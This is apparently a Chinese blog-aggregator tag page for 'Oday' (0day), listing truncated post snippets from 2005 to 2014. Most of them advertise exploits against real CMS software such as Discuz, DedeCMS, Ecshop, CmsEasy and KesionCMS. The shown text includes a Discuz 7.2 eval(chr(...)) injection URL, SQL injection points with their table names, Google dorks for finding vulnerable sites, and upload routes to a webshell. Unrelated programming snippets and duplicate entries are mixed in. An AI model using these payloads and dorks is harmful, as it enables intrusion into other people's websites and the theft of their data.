Oday

Mysql提权拿服务器

dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。  接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。
jiazhipeng12·2014-12-08 16:11

Python 文件I/Oday14

本章只讲述所有基本的的I/O函数,更多函数请参考Python标准文档。打印到屏幕最简单的输出方法是用print语句,你可以给它传递零个或多个用逗号隔开的表达式。此函数把你传递的表达式转换成一个字符串表达式,并将结果写到标准输出如下:#!/usr/bin/python   print "Python is really a great language,", "isn't it?";你的标准屏幕上会
扣扣阳·2014-08-11 22:42

抓取百度搜索结果

/usr/bin/python  #coding:utf-8  #  #time:2014-2-28  #write:Jack  #info:recommend example oday  #  import
阿木阿木·2014-03-03 16:00

漏洞利用脚本[exploit]编写

/usr/bin/python #coding:utf-8 # #time:2014-2-21 #write:jack #info dedecms oday plus.search.php  exploit
阿木阿木·2014-02-21 20:00

cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)

注入漏洞注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0类型:mysqlblind—string错误关键字:online.gif表名:cmseasy_user列明:userid,username,password直接放Havij里面跑。错误关键字:online.gif添加表名:cmseasy_user列表:userid,usern
god_7z1·2013-01-03 10:10

博贤科技管理系统漏洞oday

原漏洞:搜索inurl:cpzs.asp?ProClass=根目录下  /manage/Product/add_news.asp缩略图上传asp马提交后,选择EDIT找到那个asp的名称构造http://网址/UpLoadPic/Pro_Pic/上传获得的地址.asp最新的漏洞:搜索inurl:cpzs.asp?ProClass=根目录下  manage/Product/add_newsclass
shanzhaisofter·2012-07-05 15:15

ios开源项目组件

阅读更多转自:http://hi.baidu.com/oday/blog/item/568c4123b6d29a4e9822ed0e.html因为iOSSDK相对比较底层,所以开发者就得受累多做一些体力活
benbenxiongyuan·2012-05-30 11:00

ios开源项目组件

阅读更多转自:http://hi.baidu.com/oday/blog/item/568c4123b6d29a4e9822ed0e.html因为iOSSDK相对比较底层,所以开发者就得受累多做一些体力活
benbenxiongyuan·2012-05-30 11:00

ios开源项目组件

转自: http://hi.baidu.com/oday/blog/item/568c4123b6d29a4e9822ed0e.html 因为iOS SDK相对比较底层,所以开发者就得受累多做一些体力活
benbenxiongyuan·2012-05-30 11:00

dz2.5 oday

刚群里黑哥丢出个乌云的链接:http://www.wooyun.org/bugs/wooyun-2012-06420问谁上,我说我上吧,职业病,看到discuzdede啥的漏洞一下就精神了,哈哈……过程简单说下,记的有点乱不贴太多代码了diff一下看balabalabala.....  if(!defined('IN_DISCUZ')){@@-89,7+89,7@@}}if($searcharra
yatere·2012-04-27 16:00

xp/win7 win32k kernel 0day

目前还是ODay,转自DEBUGMAN老外今天公布的,改了一下XP的可以支持任意权限用户触发建立一个名为1123的user权限用户运行可触发~(不是老外,翰海源的instruder公布的。
evi10r·2011-11-25 19:00

为自己准备的书籍,学习之

                                               《汇编语言》王爽著学习当中《WIN32汇编教程》罗云彬著未开始《加密与解密第三版》 看雪论坛未开始《Windows驱动开发技术详解》未开始《Oday
favormm·2011-10-19 22:00

10岁女黑客发现游戏“Oday漏洞”

在DefCon19会议上,一名化名为CyFi的10岁女孩声称发现了游戏中的“Oday漏洞”——虽然此类“变速精灵”漏洞早被人发现了,但别忘了这位小黑客只有10岁。
blackhat lastland·2011-08-08 13:00

ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell

据说该0day是fjhgx(俺是农村的)大牛发现的。。。Exp等黑小子发吧。。。或者自己手动也行。。。以前很早的东西了  刚测试还可以用至于有一些能不能搞自行测试  这些东西都可以想起以前的兄弟们我对这些已经不敢兴趣了有什么好东西我会陆续放出工具我会打包!ecshop通杀2.6*2.7GBK版本附上测试图!(射出编码0x全部替换)(替换后的编码)(lcx的php注射工具转换编码FromHex转换后
wordman·2011-07-24 11:08

oday--powered by discuz! 7.2

利用google搜索关键字 intxt:poweredbydiscuz!7.2  找到一个论坛,注册一个账号注册好后,使用exp http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115)
wordman·2011-06-28 09:42

dedecms xss oday通杀所有版本 可getshell

可getshell为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。
god_7z1·2011-06-26 00:00

oday-------------powered by discuz! 7.2

利用google搜索关键字 intxt:poweredbydiscuz!7.2 找到一个论坛,注册一个账号注册好后,使用exp http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).
houwenhui·2011-05-23 15:55

关于最新的FLASH ODAY网马的生成器

FLASH今年最新的可利用的ODAY,再次爆发。特发此简单利用的生成器。可以用来测试自己机器的安全性,不可用于非法!
wordman·2011-04-23 10:42

网络安全工具百宝箱

Canvas偶尔也会发现一些ODay漏洞。点击下载(需要注册下载试用版)Honeyd:您私人的蜜罐系统Hon
witer666·2011-01-19 21:24

Ecshop最新版v.272本地包含漏洞Oday

很久前就发现了,今天发布出来吧,鸡肋的,其实很简单,就是很多人没有注意这里:直接看代码:“js/calendar.php”:$lang=(!empty($_GET['lang']))?trim($_GET['lang']):'zh_cn';//没有过滤,很明显的包含漏洞if(!file_exists('../languages/'.$lang.'/calendar.php')){$lang='zh
obnus·2011-01-12 13:44

科讯网站管理系统 Kesion v6.5 CMS Oday 利用工具

[!]作者:seraph[!]QQ:924010748[!]程序名称;KesionCMS[!]官方网站;www.Kesion.cn[!]下载地址;www.kesion.cn[!]包含版本:v6.5[!]漏洞文件:user/UpFileSave.asp[!]漏洞描述:通过自己构造参数AutoReName=3,可以将上传的文件名保存原样,通过截断可以直接得到SHELL:限制,后台禁止了注册,或者禁止了
佚名·2010-09-30 18:03

jboss oday test

detail:thisfile'sfunctionistobeusedtocreateanewjspfilewithjbosslocation[JBOSS_HOME\server\default\deploy\management\console-mgr.sar\web-console.war\]HTTPaccessaddresshttp://IPaddress:Port/web-console/
shnulaa·2010-09-26 16:00

fckeditor 2.63 0day漏洞

这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。
zpball·2010-06-21 14:00

fckeditor 2.63 0day漏洞

这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。
zpball·2010-06-21 14:00

phpaaCMS V0.3 存在注射oday漏洞 (图)

偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'\''atline1//您已经在您
小王·2010-04-19 20:53

phpaaCMS V0.3 存在注射oday漏洞 (图)

偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear'\''atline1//您已经在您
小王·2010-04-19 20:53

Oday,简单拿webshell

 关键字:inurl:urlProblem.asp谷歌一下~找个站打开然后替换存在漏洞的文件/admin/include/upload_form.asp把这个文件urlProblem.asp替换成上面的漏洞地址。enter~然后传马吧~ 
nphn·2010-03-30 16:12

Oday,简单拿webshell

 关键字:inurl:urlProblem.asp谷歌一下~找个站打开然后替换存在漏洞的文件/admin/include/upload_form.asp把这个文件urlProblem.asp替换成上面的漏洞地址。enter~然后传马吧~ 
nphn·2010-03-30 16:12

拿到电子工业出版社的赠书三本

    呵呵,今天拿到《无线网络安全攻防实战》、《Oday安全:软件漏洞分析技术》以及《Linux服务器安全策略详解》三本书,看到新书,心中热血沸腾,感觉学习新知识就是一种快乐,读别人写的书也是一种快乐
simeon2005·2008-12-02 09:38

迅雷本地溢出ODAY

 以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口C:\>netstat-na|find"36897"TCP127.0.0.1:368970.0.0.0:0LISTENING绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。......23132CBE68
blacksnow·2008-05-08 01:23

请问任意选择某年某月的第几周,然后确定这周的开始日期和结束日期的函数要怎么怎么写

/* 得到某年某月的第几个星期几的日期 oYear: 年 oMonth:月 oDay: 星期几 k:第几个(0表示第一个) */ function getDa
jy1245626·2008-03-30 19:00

优秀.net 控件包介绍

oday上看到得,将介绍摘录在这里 NetAdvantage是目前为止最为完整的表示层组件集,它所提供的组件集可用于构建基于Windows应用程序、XML web services、和web解决方案的界面
jackyrong·2005-02-18 19:00

优秀.net 控件包介绍

oday上看到得,将介绍摘录在这里 NetAdvantage是目前为止最为完整的表示层组件集,它所提供的组件集可用于构建基于Windows应用程序、XML web services、和web解决方案的界面
jackyrong·2005-02-18 19:00

优秀.net 控件包介绍

oday上看到得,将介绍摘录在这里 NetAdvantage是目前为止最为完整的表示层组件集,它所提供的组件集可用于构建基于Windows应用程序、XML web services、和web解决方案的界面
jackyrong·2005-02-18 19:00

优秀.net 控件包介绍

oday上看到得,将介绍摘录在这里 NetAdvantage是目前为止最为完整的表示层组件集,它所提供的组件集可用于构建基于Windows应用程序、XML web services、和web解决方案的界面
jackyrong·2005-02-18 19:00

优秀.net 控件包介绍

oday上看到得,将介绍摘录在这里 NetAdvantage是目前为止最为完整的表示层组件集,它所提供的组件集可用于构建基于Windows应用程序、XML web services、和web解决方案的界面
jackyrong·2005-02-18 19:00
上一页 1 2 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他